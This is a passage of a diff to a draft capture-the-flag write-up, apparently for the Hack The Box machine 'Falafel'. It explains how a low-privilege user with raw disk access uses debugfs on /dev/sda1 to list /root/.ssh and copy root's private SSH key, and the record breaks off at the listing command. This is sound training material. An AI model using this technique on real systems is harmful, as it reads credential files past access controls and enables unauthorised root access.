tpetersonkth/tpetersonkth.github.io/_drafts/HTB-Falafel-Writeup.md

 tmpfs               5120       0      5120   0% /run/lock
 tmpfs             508008       0    508008   0% /sys/fs/cgroup
 tmpfs             101604       0    101604   0% /run/user/1000
+yossi@falafel:~$
+{% endhighlight %}

+From the output of this command, we find that there is only one hard drive located at `/dev/sda1`.
+We can access this hard drive using `debugfs`, which lets us list directories and copy files, among other things.
+We proceed to check if the `root` user has any SSH keys by executing `ls -l /root/.ssh`.
+We find a private key which we can copy to `/tmp/id_rsa` using `dump`.
+We do this since we don't have access to the original file but will have access to the copy of the file.

+{% highlight none linenos %}
 yossi@falafel:~$ @@debugfs /dev/sda1@@
 debugfs 1.42.13 (17-May-2015)
 debugfs:  @@ls -l /root/.ssh@@